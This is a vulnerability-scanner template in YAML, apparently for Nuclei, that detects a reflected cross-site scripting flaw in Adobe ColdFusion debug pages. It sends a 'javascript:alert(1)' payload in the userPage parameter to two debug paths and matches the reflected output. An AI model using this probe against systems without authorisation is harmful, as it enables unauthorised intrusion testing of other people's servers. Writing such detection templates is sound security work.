28 lines
607 B
YAML
28 lines
607 B
YAML
|
id: coldfusion-debug-xss
|
||
|
|
||
|
info:
|
||
|
name: Adobe ColdFusion Debug Page XSS
|
||
|
author: dhiyaneshDK
|
||
|
severity: medium
|
||
|
tags: adobe,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
|
||
|
- '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '"cf_main_cf" src="javascript:alert(1)"'
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- "text/html"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|